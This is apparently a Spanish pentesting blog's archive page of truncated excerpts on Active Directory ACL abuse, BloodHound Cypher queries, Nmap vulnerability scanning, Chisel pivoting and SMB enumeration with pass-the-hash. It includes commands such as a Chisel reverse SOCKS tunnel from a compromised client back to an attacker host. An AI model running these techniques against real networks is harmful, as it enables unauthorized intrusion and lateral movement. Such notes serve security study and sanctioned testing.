Categories

Archive

Abusando ACLs/ACEs del Directorio Activo (AD)

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse Algunos de los tipos y permisos de objetos de Active Directory que interesan a los atacantes:GenericAll – permisos full al objeto (adicionar usuarios a un grupo o resetear la contraseña de usuarios)GenericWrite – actualizar los atributos de los objetos Read more ›

BloodHound Cypher Cheatsheet

https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/ Setear todos los usuarios owned mediante Cypher query:En la lista se definen los usuarios owneados WITH [‘usuario1′,’usuario2’] as ownedlistUNWIND ownedlist as ownedWITH ownedMATCH (m:User {samaccountname:owned})SET m.owned=TRUERETURN m El cypher query puede ser ejecutado también en una sola línea WITH Read more ›

Usando NMAP para escanear vulnerabilidades

https://geekflare.com/nmap-vulnerability-scan/ Nmap-vulnerscd /usr/share/nmap/scripts/git clone https://github.com/vulnersCom/nmap-vulners.gitnmap -sV –script vulners [–script-args mincvss=] <target>nmap -sV –script nmap-vulners/ -p80,223 <target>Ejemplo: sudo nmap -sU -sV –script vulners -p U:53 <target> Nmap – vulnnmap -sV –script vuln Nmap-vulscancd /usr/share/nmap/scripts/git clone https://github.com/scipag/vulscan.gitln -s pwd/scipag_vulscan /usr/share/nmap/scripts/vulscancd vulscan/utilities/updater/chmod +x Read more ›

Técnicas de Pivoting

https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding https://michmich.eu/Cheatsheets/internal/07-pivoting/ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md Chisel You can download it from the releases page of https://github.com/jpillora/chisel You need to use the same version for client and server socks ./chisel server -p 8080 –reverse #Server — Attacker ./chisel-x64.exe client 10.10.14.3:8080 R:socks #Client — Read more ›

Pentesting SMB

https://book.hacktricks.xyz/network-services-pentesting/pentesting-smbhttps://github.com/ShawnDEvans/smbmap Para realizar un listado recursivo -R, y con -p en lugar de la contraseña se puede usar el hash “NT:LM”